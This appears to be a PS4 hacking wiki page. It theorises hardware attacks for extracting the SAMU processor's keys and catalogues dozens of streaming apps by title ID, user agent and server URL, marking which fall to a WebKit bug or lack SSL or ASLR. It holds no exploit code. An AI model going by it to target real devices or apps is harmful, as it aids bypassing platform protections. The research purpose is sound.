The PS4 has bugs. Some bugs can lead to Vulnerabilities. Others lead to nothing useful (yet) but can serve as examples of what not to do.

Theoretical Hardware Attacks[edit | edit source]

We already know for certain someone out there has hacked the SAMU or stolen Sony's keys because of leaked decrypted kernels. These are some end-all hardware solutions to hack the PS4, theorized by golden. I give a score out of 10 for each.

Power analysis against SAMU 9.9/10[edit | edit source]

There are theories that this won't work because...

SAMU silicon spoofs hamming weight (prevents differential power analysis and EM analysis)
It is running too fast and not feasible since cost is too high
You cannot slow down the SAMU clock since it is internally checked
Some more issues?

If there is some sort of main CPU/SAMU PLL bypass we might be able to slow the clock down really easily, otherwise we must inject our own clock signal. I believe the SAMU clock is controlled by syscon? If the check is in syscon then we can just patch it out. Maybe write a custom Linux fork that never loads into usermode but just sits and constantly decrypts different self/sprx files. We could communicate with this Linux fork over UART. This attack only needs to work once to recover some keys.

SAMU power/clock glitch fault injection 5/10[edit | edit source]

During an AES round we might be able to do some SCA by injecting faults. See the paper from umass.edu in the section below. We would write a minimal operating system to reboot into after exploiting an older firmware. This 'operating system' will simply shutdown most of the CPU cores and pin one core. This code would communicate with the SAMU and do everything the normal SCE SAMU driver does for decryption. We can then use UART output from CPU to time our glitch attacks. The faulty data retrieved by our custom SAMU driver might be able to reveal secret key data. This attack only needs to work once to recover some keys.

SAMU backside UV/IR fault injection 3/10[edit | edit source]

Just as the title states. Very expensive to setup and do properly. If we can flip an even number of bits it the encrypted SAMU SRAM region of the chip (even since ECC parity bit), then some sort of side channel analysis might be able to be done to recover key material. Some silicon reverse engineering would be involved to find the SRAM region on die.

"Moreover, it is no longer possible to hit a single SRAM cell with the current etching technologies, since the width of the gate dielectric is now more than 10 times smaller than the shortest wavelength of visible light." To get an idea of the cost of this equipment... "A class of threats which cannot be ignored if the attackers have access to a larger budget (above the aforementioned $3000 and up to millions of dollars)" (http://euler.ecs.umass.edu/research/bbkn-IEEEP-2012.pdf)

The fault injection is all infeasible unless some elite hackzor came out of the woodwork. We only need to have this work once.

SEM/FIB/microprobes 2/10[edit | edit source]

We might be able to readout the bootrom with some microprobes? Sniff data lines somewhere? The SAMU SRAM memory is encrypted so we would have to probe the LM32 instruction bus or something... infeasible but possible.

USB[edit | edit source]

The FreeBSD USB stack has been theorized, by a well know security researcher, to contain some high profile bugs. A dongle might just be possible. For example, last year someone ran a fuzzer on the Linux USB stack and found some crazy bugs: https://github.com/google/syzkaller/blob/master/docs/linux/found_bugs_usb.md

Bluetooth[edit | edit source]

There are probably some bugs in the Sony/FreeBSD Bluetooth stack. Sony has a habit of ruining their own copy and paste. One of the reasons fail0verflow decided to attack the DS4 controller firmware was because it had a nice interface to the kernel which could contain bugs.

Look at Blueborne and CVE-2017-0781.

Usermode (DVD player)[edit | edit source]

Exploiting DVD player on PS4 is probably impractical on later System Software versions (since around 1.70) because of usermode ASLR so exploiting the Bluray Disc player through BD-Java is easier.

FreeDVDBoot[edit | edit source]

Launching a DVD containing the FreeDVDBoot PS2 exploit crashes the PS4 with error CE-36329-3 so the PS4 might be vulnerable to the exact same bug as the PS2. The PS3 is also affected.

On PS4, there is IFO parsing in SceShellCore, BdmvPlayerCore and BdvdPlayerCore (NPXS20113) executables. They seem to load entire IFO into memory, then parse out contents. The code seems more or less identical between the executables.

See SceShellCore, BdmvPlayerCore and BdvdPlayerCore (NPXS20113) from PS4 <= 7.51.

Patched[edit | edit source]

Maybe since PS4 7.55.

Usermode (network in games and applications)[edit | edit source]

YouTube[edit | edit source]

Netflix[edit | edit source]

WebKit exploit in some PS4 applications (codename WeebSploit)[edit | edit source]

Note: This section will be partially moved to the Vulnerabilities page after being splitted from all PS4 applications that are not exploitable via WebKit, and improved.

WeebSploit is the codename given by CelesteBlue to WebKit exploits affecting some applications on PS Vita and PS4.

Credits[edit | edit source]

WebKit exploiters of the PS Vita scene, notably Chris Wade (cmwdotme), Davee, Proxima, xyz, Yifan Lu, TheFloW
WebKit exploiters of the PS3 scene, notably xerpi, zecoxao, esc0rtd3w
WebKit exploiters of the PS4 scene, notably Proxima, nas, Fire30, qwertyoruiop, Quentin Meffre, Mehdi Talbi, sleirsgoevy, abc
m0rph3us1987 for the initial discovery and public disclose in 2018
CelesteBlue for the 2019 private research and public disclose in 2026, SocraticBliss and dots-tb for the name "weebsploit"
earthonion, Gezine and all people beyond the YouTube and Netflix exploits on PS5
earthonion and all people beyond the PlayStation Vue exploit on PS4

History[edit | edit source]

This section mostly comes from CelesteBlue's private research on hacking PS4 applications in July 2019, following m0rph3us1987's write-up presented publicly at Chaos West 2018 on 2018-12-18.

The idea of getting usermode code execution on the PS4 via third-party applications that use the WebKit engine to execute JavaScript can be traced back as early as October 26, 2014 [1] when Yifan Lu, the famous PS Vita hacker, suggested it. There have been also a lot of investigations by esc0rtd3w on exploiting the PS3 media applications but the JavaScript engine was rarely WebKit and for making PS3HEN, the PS3Xploit Team ended up using the PS3 internet browser with a vulnerability ported by xerpi from the PS Vita oldest internet browser. After that the WebKit vulnerability used in the HENkaku exploit chain got patched on PS Vita System Software 3.61, and before that a new WebKit vulnerability, ported from qwertyoruiop' PS4 internet browser exploit by TheFloW, was released for the PS Vita with the henlo exploit chain, CelesteBlue investigated WebKit exploits in PS Vita and PS4 applications. The PS4 and the PS Vita have many media applications in common. One of them is the DMM.com application, released on 2013.11.14 on PS Vita (https://store.playstation.com/ja-jp/product/JA0003-PCSC80021_00-DMM0000000000000) and released on 2015.10.01 on PS4 (https://store.playstation.com/ja-jp/product/JA0012-CUSA03302_00-DMMCOMPS40000000). The first PS4 applications revealed to be vulnerable to WebKit exploits were IGN and Vevo by m0rph3us1987, while the latest PS4 System Software version was 3.15. m0rph3us1987 also mentioned YouTube, Netflix and Amazon Prime Video but these applications were either not using WebKit or not as easy or convenient to exploit. Months later, CelesteBlue found easier to exploit Red Bull TV, GameONE, Gamereactor and DMM.com on the PS4, whilst on the PS Vita he also got some successes with GameONE and a few other DRM Free applications.

CelesteBlue did not release publicly information before January 2026, when the PlayStation Vue exploit for PS4 was released. His main reason to keep it secret was that WebKit exploits in PS4 applications were not convenient for a release because of the necessity to download them from the PS Store to get a license file and activate the PS4 while being on latest System Software version, and that the exploits could get patched easily via application updates, PS4 System Software updates or a delisting of the applications from the PS Store. WebKit exploits in the PS4 internet browser had much less drawbacks however as of January 2026, there is no exploit for the internet browser on PS4 versions from 10.00 to latest nor on PS5 5.00 and more recent. On PS3 and PS Vita, the internet browser can be hacked even with latest System Software version. In 2025, it was discovered that the YouTube and Netflix applications on the PS5 could run without a license file, and it was re-discovered that the same was true for the PlayStation Vue application on the PS4. This peculiarity makes PlayStation Vue the most convenient PS4 application for exploitation. On PS5, Videos and TV applications require a license to run, since System Software 12.60, and the same could happen to PlayStation Vue on the PS4 in future PS4 System Software updates.

PS4 applications vulnerable to WebKit exploits[edit | edit source]

Using WebKit and pwned (crash of the application using a WebKit vulnerability):

IGN
EP4436-CUSA00268_00-WEBMAF0000000IGN (UK)
1.00 (FW 1.06, signin, no SSL, pwned with JSArray::sortCompactedVector), 1.02 (FW 3.00, redir)
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0
no SSL, no ASLR
HP4436-CUSA00420_00-WEBMAF0000000IGN
UP2109-CUSA00238_00-WEBMAF0000000IGN (CAN, RSA, MEX, US)
1.00 (no SSL, pwned with JSArray::sortCompactedVector, offline), 1.31 (FW 3.55, redir)
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0
http://www.ign.com/apps/playstation/
http://www.ign.com/apps/playstation4/v1.3/ (to come: v1.4, v1.5)
As of 2022, the service is no longer available.
Uses WebMAF on PS3 and PS4.

GameONE
EP4455-CUSA00294_00-GAMEONEAPPPS4000 (FR)
1.00 (no SSL, pwned with JSArray::sortCompactedVector), 1.02 (no SSL, pwned with JSArray::sortCompactedVector)
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0
no ASLR
http://gameone-catchup.wiztivi.com/webmaf-gameonecatchup-frontend/index.html
http://gameone-catchup.wiztivi.com/webmaf-gameonecatchup-frontend/scripts/sdk.js
http://gameone-catchup.wiztivi.com/webmaf-gameonecatchup-frontend/scripts/app/app.js
http://gameone-catchup.wiztivi.com/webmaf-gameonecatchup-frontend/dojoroot/app/pages/webMaf/index.html
http://gameone-catchup.wiztivi.com/gameonecatchup-backend/configuration?nbProgram=2
Uses WebMAF on PS3 and PS Vita.

Gamereactor
EP4545-CUSA01710_00-WEB00GAMEREACTOR (AUS, DEN, ESP, FIN, GER, IRE, ITA, NZ, NOR, POR, SA, SWE, UK)
1.00 (no SSL, pwned with JSArray::sortCompactedVector)
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0
no SSL, ASLR
http://www.gamereactor.dk/apps/ps4/
Uses WebMAF on PS4.

beIN Sports
EP4520-CUSA01258_00-WEBMAF000000BEIN (AU BH BE BG HR CY CZ DK DE ES FI FR GB GR HU IS IN IE IL IT KW LB LU MT NL NZ NO AT OM PL PT QA RO RU SA CH SE SK SI TR UA AE ZA)
CUSA05351
1.00 (no SSL, pwned with JSArray::sortCompactedVector), 1.01-?1.03? (FW 2.50, redir)
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0
http://tvapps.beinsports.net/bein.html
Uses WebMAF on PS4.

beIN Connect
CUSA08612
EP8840-CUSA08722_00-BEINCONNECTSPAIN 

FilmoTV
EP4453-CUSA00279_00-WEBMAF000FILMOTV (FR)
1.00 (no SSL, pwned with JSArray::sortCompactedVector), 1.03 (FW 3.00, redir), 2.00 (FW 6.02), 2.01 (FW 6.51)
Mozilla/5.0 (PlayStation 4 WebMAF) AppleWebKit/538.8 (KHTML, like Gecko) WebMAF/v2.1.0-0-g5586764 SDK: (0x06008051u), Built: Feb  4 2019 15:08:55
Uses WebMAF on PS3 and PS4.

MUBI
EP4164-CUSA01196_00-WEBMAF000000MUBI
UP4164-CUSA01500_00-MUBISCEASUBMTI00
CUSA03459
1.00 (no SSL, pwned with JSArray::sortCompactedVector), 1.01 (FW 3.00, not vulnerable)
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0
Uses WebMAF on PS3 and PS4.

7plus
EP4447-CUSA01287_00-WEBMAF00000PLUS7 (AU, NZ, ?)
CUSA35181
1.00 (no SSL, pwned with JSArray::sortCompactedVector), 1.03 (not vulnerable)
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0
http://plus7.apps.accedo.tv
Uses WebMAF on PS3 and PS4.

ABC iview
EP4443-CUSA01626_00-ABC0IVIEW0000000 (AUS)
1.00 (no SSL, pwned with JSArray::sortCompactedVector)
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0
http://tv.iview.abc.net.au/playstation.php
Uses WebMAF on PS3.

Foxtel Now (formerly Foxtel Play)
EP4480-CUSA00518_00-FOXTELPLAYAPP000 (AUS)
1.00 (no SSL, pwned with JSArray::sortCompactedVector), 1.01 (not vulnerable)
http://foxtel-go-sw.foxtelplayer.foxtel.com.au/playstation/client/PlayStation4.php
http://foxtel-go-sw.foxtelplayer.foxtel.com.au/playstation/client/securejs.php
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0
https://www.stevenbai.net/sonyps/
https://en.wikipedia.org/wiki/Foxtel_Now

Presto
EP4480-CUSA03793_00-WEBMAF0000PRESTO
Uses WebMAF on PS3 and PS4. Probably uses the same WebKit engine as Foxtel Now.
https://en.wikipedia.org/wiki/Presto_(streaming_company)

BINGE
EP8850-CUSA31644_00-3897431192515463
Uses WebMAF. Probably uses the same WebKit engine as Foxtel Now.
https://en.wikipedia.org/wiki/Robi_(company)#Binge

Kayo Sports
EP8850-CUSA18595_00-SM0KS00000000001
Uses WebMAF. Probably uses the same WebKit engine as Foxtel Now.
https://en.wikipedia.org/wiki/Kayo_Sports

DMM.com
JA0012-CUSA03302_00-DMMCOMPS40000000 (JP)
1.00 (redirected http://ps4.dmm.co.jp, no SSL, pwned with JSArray::sortCompactedVector), 4.06 (SSL, redirection possible but maybe no JS hijack)
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0
DOES NOT REQUIRE PSN CONNECTION BUT REQUIRES A LICENSE

Untested PS4 applications[edit | edit source]

See also:

[2]
Game_Titles/db, whose all non-PSVR applications from CUSA00001 to CUSA50918 have been listed on this "Bugs" page
User_talk:Euss/Media_Services
Media Services
List of most WebMAF based applications on PS3

Using WebKit but not pwned:

OCS
EP8000-CUSA01916_00-WEBMAF0000000OCS
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0
not vulnerable
Uses WebMAF on PS3 and PS4.

VEVO
EP4547-CUSA01692_00-WEBMAF000000VEVO (ESP, FRA, GER, IRL, ITA, NLD, NZ, POL, UK, US)
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0
no SSL, no ASLR?
Uses WebMAF on PS3 and PS4.

Claro Video
UP8833-CUSA07829_00-WEBMAF000DEFAULT
CUSA04859
CUSA04945
CUSA05019
BR
1.00 (redir), 1.01 (redir)
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0
http://playstation4.clarovideo.net/FRONTEND/
Uses WebMAF on PS4.

SFR Sport
EP8845-CUSA11455_00-SFRSPORT00000000
1.00 (redir)
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0

RMC SPORT
EP8845-CUSA14066_00-WEBMAF000DEFAULT
1.00 (redir), 1.01 (redir)
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0
Uses WebMAF on PS4.

Dailymotion
EP4515-CUSA01161_00-00000DAILYMOTION
1.00 (redir), 1.01 (redir)
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0

Red Bull TV
CUSA09246
UP8904-CUSA03460_00-REDBULLTVAPP2015
EP8842-CUSA09418_00-REDBULLTVEUROPS4
JA0019-CUSA08391_00-REDBULLTVAPPASIA
HP8918-CUSA09119_00-REDBULLTVASIAPS4
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0
1.00: Does not require PSN connection. Redirection impossible.
1.10: Does not require PSN connection. Redirection possible.
http://ps4.redbull.tv/
Uses WebMAF on PS3.

Yupp TV
UP2088-CUSA00097_00-YUPPTVXXXXTEST00 (US)
EP8810-CUSA03244_00-WEBMAF0000YUPPTV
1.00 (redir)
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0
http://www.yupptv.com/ps4/
Uses WebMAF on PS3 and PS4.

Stan
EP8814-CUSA03580_00-WEBMAF000000STAN (Australia)
1.00 (redir), 1.08 (not vulnerable)
http://playstationapp.stan.com.au
Mozilla/5.0 (PlayStation 4) AppleWebKit/531.3 (KHTML, like Gecko) SCEE/1.0 Nuanti/2.0
Uses WebMAF on PS3 and PS4.
Stan (stylised as Stan.) is an Australian subscription over-the-top streaming television service.

Probably WebMAF based applications, probably using WebKit:

Okko Movies HD (Okko Фильмы HD)
EP8818-CUSA03794_00-WEBMAF000000OKKO
Uses WebMAF on PS4.

du View
EP4551-CUSA02063_00-WEBMAF0000DUVIEW
Uses WebMAF on PS3 and PS4.

DRTV
EP8807-CUSA02676_00-WEBMAF000000DRTV
Uses WebMAF on PS3 and PS4.

FILMIN
EP8824-CUSA05126_00-WEBMAF0000FILMIN
Uses WebMAF on PS3 and PS4.

DRAMAFEVER
UP8903-CUSA03400_00-DRAMAFEVER000100
Uses WebMAF on PS3 and likely on PS4.

Min Bio
EP8811-CUSA03207_00-WEBMAF0000MINBIO
Uses WebMAF on PS3 and PS4.

Grada1 TV
EP8836-CUSA07838_00-WEBMAF01GRADA1TV
Uses WebMAF on PS4.

Dansk Filmskat
EP8811-CUSA03206_00-000DANSKFILMSKAT
Uses WebMAF on PS3 and likely on PS4.
Uses WebKit on PS4.
Passcode: 2GHPo-QlC60u2fknmepZ2W7K5fPPK_eC.

Lightbox
EP4548-CUSA01693_00-WEBMAF00LIGHTBOX (NZ)
Uses WebMAF on PS3 and PS4 (?, 1.66, 2.4.0, 3.1.0, 3.2.0).
On 7 July 2020, Sky merged Lightbox into its own streaming service Neon using the existing streaming platform of Lightbox.
Neon must not be mistaken with Neon Alley (CAN, US), that was discontinued and moved to Hulu Plus.

Sky Ticket / WOW
EP8809-CUSA03107_00-WEBMAFSKYONLINED
CUSA37378
Uses WebMAF on PS3 and PS4.

Sky CH
EP8809-CUSA13816_00-0000000000000000

Fan Pass
EP8832-CUSA06710_00-SKYNETWRKFANPASS
Formerly named Sky Sport Now.

Pathé Thuis
EP4466-CUSA01312_00-WEBMAF00000PATHE (Netherlands)
Uses WebMAF on PS3 and PS4.

Redbox
UP7410-CUSA30257_00-WEBMAF0000REDBOX
Uses WebMAF on PS4.

Redbox Instant
UT0022-CUSA00145_00-ZZZZZZZZZZZZZRBI (US)
Patch 2.00 requires PS4 1.70 but even lower for base package.
Redbox Instant is a movie streaming service by Verizon.
https://www.youtube.com/watch?v=IniAu5Sm6xY
base JSON still available:
http://gs2.ww.prod.dl.playstation.net/gs2/appkgo/prod/CUSA00145_00/3/f_6867c54020304b0e838dd036f78fd5ebb2411d42a3f3a866f307b9b822427dc5/f/UT0022-CUSA00145_00-ZZZZZZZZZZZZZRBI.json
base PKG, dead or restricted link:
http://gs2.ww.prod.dl.playstation.net/gs2/appkgo/prod/CUSA00145_00/3/f_6867c54020304b0e838dd036f78fd5ebb2411d42a3f3a866f307b9b822427dc5/f/UT0022-CUSA00145_00-ZZZZZZZZZZZZZRBI.pkg
update JSON still available:
http://gs2.ww.prod.dl.playstation.net/gs2/ppkgo/prod/CUSA00145_00/1/f_dfa9e1e7c3834035a9cf46aced074f8e25dc560046bca079acf6424ac9d859f0/f/UT0022-CUSA00145_00-ZZZZZZZZZZZZZRBI-A0200-V0100.json
update PKG still available:
http://gs2.ww.prod.dl.playstation.net/gs2/ppkgo/prod/CUSA00145_00/1/f_dfa9e1e7c3834035a9cf46aced074f8e25dc560046bca079acf6424ac9d859f0/f/UT0022-CUSA00145_00-ZZZZZZZZZZZZZRBI-A0200-V0100.pkg

PLAYER
EP4343-CUSA00358_00-WEBMAF0000000TVN
Publisher: TVN Media
Uses WebMAF on PS4.

Tennis TV
EP8834-CUSA07415_00-WEBMAF00TENNISTV
UP8847-CUSA15736_00-WEBMAF00TENNISTV
1.00: Requires PSN connection.
Uses WebMAF on PS4.

Plex
UP4544-CUSA01850_00-PLEX000000000000
EP4544-CUSA01703_00-WEBMAF000000PLEX
Uses WebMAF on PS3 and PS4.
not vulnerable
https://forums.plex.tv/t/platform-update-for-ps4/146051
https://forums.plex.tv/t/new-playstation-4-app-preview/633771/38
https://forums.plex.tv/t/plex-for-playstation-4/328364/118
https://forums.plex.tv/t/has-plex-for-ps4-been-discontinued-there-is-no-access-to-it/851293

Animelab
EP8812-CUSA03389_00-WEBMAF00ANIMELAB (Australia, NZ)
1.00 (not vulnerable), 1.01 (not vulnerable)
Uses WebMAF on PS3 and PS4.

9Now
EP8831-CUSA06299_00-WEBMAF0000009NOW
1.00
Uses WebMAF on PS4.

Now TV
EP4391-CUSA00117_00-NOWTVFULLPS40000
EP4391-CUSA07306_00-NOWTVFULLPS40000
EP4439-CUSA00278_00-WEBMAF0SKYITALIA
EP4391-CUSA12336_00-NOW0TV0ITALY0NEW
CUSA26585
Uses WebMAF on PS3 and PS4 (<2.2, 2.2, 2.7.0, 3.1.1, 3.1.3).

NowTV Beta
EP4391-CUSA10420_00-NOWTVROIBETA0000
EP4391-CUSA00519_00-SKYNOWTVBETA0000
Uses libjscore on PS3.

Now TV Beta
EP4391-CUSA01935_00-WEBMAF00000NOWTV
Uses WebMAF on PS4.

TV From Sky
EP4391-CUSA01245_00-SKYGOFULLPS40000

TV from Sky (Beta)
EP4391-CUSA01246_00-SKYGOBETAPS40000

TV from Sky Trial
EP4391-CUSA14603_00-WEBMAF000DEFAULT

Sky
EP4391-CUSA11488_00-AWCDXYZH123NOPQR
Uses WebMAF on PS3.

Sky X
EP4391-CUSA15009_00-SKYX2019SKYX2019

Sky X Beta
EP4391-CUSA18405_00-SKYXBETASKYXBETA

Sky Q
EP4391-CUSA17187_00-SKYQ2019SKYQ2019

Sky Q Beta
EP4391-CUSA27986_00-SKYQBETASKYQBETA

WeatherNation
UP2170-CUSA03976_00-WEATHERNATION015
Uses WebMAF on PS Vita and PS4.

Animax
EP4398-CUSA01115_00-WEBMAF0000ANIMAX
JA0009-CUSA02181_00-WEBMAFANIMAXPLUS
Uses WebMAF on PS3, PS Vita and PS4.

MEO VideoClube
EP4428-CUSA00280_00-WEBMAF00000MEOGO
Uses WebMAF on PS4.

Blockbuster
EP4543-CUSA01669_00-WEBMAF000BBUSTER
Uses WebMAF on PS3 and PS4.

ivi
EP8847-CUSA15025_00-SONYPLAYSTATION4

Dplay
CUSA16193

Walmart Video
CUSA16202

ICFLIX
EP4532-CUSA01462_00-WEBMAF0000ICFLIX
Uses WebMAF on PS3 and PS4.

TV 2 Sumo
EP4458-CUSA00334_00-WEBMAF000TV2SUMO
CUSA00780
Uses WebMAF on PS3 and PS4.

Movistar+
EP4512-CUSA01142_00-WEBMAF00000YOMVI
Uses WebMAF on PS3 and PS4.

fuso
EP4475-CUSA00517_00-WEBMAF000000FUSO
Uses WebMAF on PS3 and PS4.

TVIGLE
EP4434-CUSA00604_00-WEBMAF0000TVIGLE
Uses WebMAF on PS3 and PS4.

TVNZ OnDemand
EP4444-CUSA02578_00-WEBMAF000000TVNZ (NZ)
Uses WebMAF on PS3 and PS4.

NRK Super
EP4509-CUSA01144_00-WEBMAF00NRKSUPER
Uses WebMAF on PS3 and PS4.

NRK TV
EP4509-CUSA01145_00-WEBMAF00000NRKTV
Uses WebMAF on PS3 and PS4.

TV3
EP4516-CUSA01346_00-WEBMAF0000000TV3
Uses WebMAF on PS3 and PS4.

Filmbox Live
EP4438-CUSA00281_00-WEBMAF000FILMBOX (BGR, CZE, GRC, HRV, HUN, POL, ROM, SVN, TUR)
Uses WebMAF on PS3 and PS4.

Multiplayer.it
EP4462-CUSA00454_00-WEBMAF00000MULTI
Uses WebMAF on PS Vita and PS4.

Clan Rtve.es
EP4490-CUSA00797_00-WEBMAF0000CLANTV
Uses WebMAF on PS3 and PS4.

SKAI
EP4465-CUSA00449_00-WEBMAF000000SKAI
Uses WebMAF on PS4.

Plush
EP4534-CUSA01468_00-WEBMAF00000PLUSH
Uses WebMAF on PS4.

RTBF
EP4400-CUSA00121_00-RTBF0000WEBMAF00 (Belgium)
Uses WebMAF on PS4.

RTBF Auvio
EP4400-CUSA44299_00-0092760140209966

Mediaset Infinity
EP4463-CUSA41147_00-0867350236276218
Uses WebMAF on PS3 and PS Vita.

Infinity
EP4463-CUSA00376_00-MEDIASETINFINITY
Uses WebMAF on PS3 and PS Vita.

Blinkbox
CUSA01226 (UK)
Uses WebMAF on PS3.

Videoland
EP4549-CUSA01763_00-WEB0000VIDEOLAND (Netherlands)
Uses WebMAF on PS3 and PS4.

Videoland V2
EP4549-CUSA32490_00-2297157498601021 (Netherlands)

iHeartRadio
UP2207-CUSA01896_00-IHEARTRADIOAPP15
Uses WebMAF on PS3.

YLE Areena
EP4446-CUSA03061_00-WEBMAF0YLEAREENA (Finland)
CUSA44434
Uses WebMAF on PS3 and PS4.

Film1
EP8820-CUSA04481_00-WEBMAF00PS4FILM1
Uses WebMAF on PS4.

MegoGo
EP8839-CUSA08290_00-WEBMAF0000MEGOGO
EP8849-CUSA17005_00-WEBMAF00RUMEGOGO
https://megogo.net/ru

NLZIET
EP8821-CUSA04506_00-WEBMAFNLZIET0000
Uses WebMAF on PS4.

STARZ PLAY
EP8827-CUSA05439_00-WEBMAF0STARZPLAY
Uses WebMAF on PS4 (1.66).

Magine TV - Live Fernsehen
EP8829-CUSA06035_00-WEBMAF000MAGINET
Uses WebMAF on PS4.

NEON NZ
EP8832-CUSA06709_00-WEBMAF0PS4NEONNZ
Uses WebMAF on PS4.

HBO
EP8806-CUSA02827_00-WEBMAF0HBONORDIC
CUSA31343
Uses WebMAF on PS3 and PS4.

HBO Portugal
EP8841-CUSA14922_00-HBOPORTUGAL00000

HBO NOW
UP2084-CUSA05223_00-HBONOWPS40000000
CUSA05211
CUSA05212
CUSA05213
CUSA05215
CUSA05219
Uses WebMAF on PS3 and probably on PS4.

HBO GO
UP2084-CUSA01567_00-HBOGOFORPS4USA00 (US)
EP8841-CUSA04053_00-WEBMAF00000HBOGO
Uses WebMAF on PS3 and PS4.

HBO Max
EP8806-CUSA46979_00-0046040646500964
EP8806-CUSA31344_00-3378412633960324
CUSA31016
CUSA31280
Uses WebMAF on PS3 and probably on PS4.

SHOWMAX / Showmax RC
EB0841-CUSA47296_00-0107588159045802
EB0841-CUSA47321_00-0795391597505094
CUSA47661
CUSA47662
CUSA47663
EP8823-CUSA04891_00-WEBMAFSHOWMAX000
Uses WebMAF on PS4.

Anghami
EP8843-CUSA09723_00-WEBMAF000ANGHAMI
Uses WebMAF on PS4.

NOS
EP4442-CUSA00120_00-NOSSPORTSAPPPS40 (Netherlands)
EP4442-CUSA02993_00-WEBMAF0000000NOS
EP8848-CUSA16977_00-WEBMAF00000NOSTV
Uses WebMAF on PS3 and PS4.

Unknown JavaScript engine or no JavaScript engine:

Ximon
EP4401-CUSA00118_00-XIMONFULLAPP0000 (Belgium, Netherlands)

Jook Video
CUSA00295

PLAYER UTILITY
CUSA00300

WWE Network
UT0025-CUSA00429_00-WWE0000000000001 (ARG, BRA, CHL, COL, MEX, PER, US, AUS)
EP4505-CUSA01092_00-WWE0000000000001 (BEL, BGR, HRV, CZE, DNK, FIN, GBR, GRC, HUN, IRL, ISR, LUX, NLD, NZ, NOR, POL, PRT, RUS, SWE, SVN, TUR, ZAF)
HT0025-CUSA00882_00-WWE0000000000001
CUSA12199
CUSA37377
User-Agent: "PS4Application libhttp/1.000 (PS4) libhttp/X (PlayStation 4)" where X is replaced by PS4 System Software version for e.g. 6.51, 12.00
1.00: Does not require PSN connection. Not vulnerable to JS redirection but JSON redirection possible.
WWE stands for World Wrestling Entertainment.

Quickflix
EP4342-CUSA00247_00-QUICKFLIX0000FUL (AUS, NZ)
https://en.wikipedia.org/wiki/Quickflix
Uses WebMAF on PS3.

Demand5
EP4346-CUSA00248_00-CHANNEL50DEMAND5 (UK)
Uses WebMAF on PS3.

Popcornflix
UP2202-CUSA01851_00-POPCORNFLIX30875 (US)
https://en.wikipedia.org/wiki/Popcornflix

Amazon Prime Video
UP2064-CUSA00130_00-AIV00000000000US (US, CAN)
EP4183-CUSA00126_00-AIV00000000000EU (GER, UK)
JA0011-CUSA03099_00-AMAZONVIDEOJAPAN (JP)
JA0011-CUSA03099_00-ASIA000000000000
CUSA01808
1.00: "Update application to use network features."
1.01+: not vulnerable via JS but maybe via other file types.
Another name is Amazon Instant Video.

Prime Video Beta
UP2064-CUSA17943_00-PRIMEVIDEOBETANA
EP4183-CUSA17942_00-PRIMEVIDEOBETAEU

Freevee / IMDb TV
EP4183-CUSA42682_00-0077912076671617
CUSA43239
Freevee is a video streaming application by Amazon. It was shutdown.

IMDb TV
UP2064-CUSA25926_00-0338501424743609
CUSA26048
IMDb TV was published by Amazon.

Molly Beta
UP2064-CUSA02877_00-AIVUSBETA0000PS4
EP4183-CUSA01888_00-AMAZONIVBETA00EU
JA0011-CUSA03413_00-AMAZONVIDEOBETA0
Molly Beta was published by Amazon.

Rakuten TV
EP4410-CUSA00123_00-WUAKI0FULL000000
JA0016-CUSA11244_00-RAKUTENTV0000001 (JP)
CUSA07145
1.00: Requires PSN connection.
Uses WebMAF on PS3.
In 2010, the service was launched in Spain under the name Wuaki.tv, and later expanded to Andorra. By 2013, it had entered the markets in Britain, as well as Italy, France, and Germany later that same year. In June 2012, e-commerce company Rakuten acquired the company, previously known as Wuaki.tv. In July 2017, Wuaki.tv changed its name to Rakuten TV.

Viaplay
EP4345-CUSA00124_00-VIAPLAYFULLAPP00 (Denmark, Finland, Norway, Sweden)
CUSA47836
Uses WebMAF on PS3.

Viaplay Beta
EP4345-CUSA01579_00-VIAPLAYBETAAPP00
Uses WebMAF on PS3.

iQIYI
HP8350-CUSA47998_00-0453390761649026
HP8350-CUSA47998_00-IQIYIWEBMAWEBAPP
Language: Simplified Chinese, English, Korean, Malay, Thai, Traditional Chinese.
iQIYI is based in Singapore.

WAKANIM
EP8833-CUSA07017_00-WAKANIM000000000
not vulnerable

NFL
UP8905-CUSA03390_00-0000000000000001
CUSA13998
Uses WebMAF on PS4 (1.42).

NFL Game Pass
EP2957-CUSA11621_00-NFLGAMEPASSEN001
CUSA17859

NFL SUNDAY TICKET
UT0028-CUSA00933_00-DIRECTVNFLPS4APP
?not vulnerable?

Virtual Joey
UP2112-CUSA00953_00-ECHOVIRTUALJOEY1 (US)
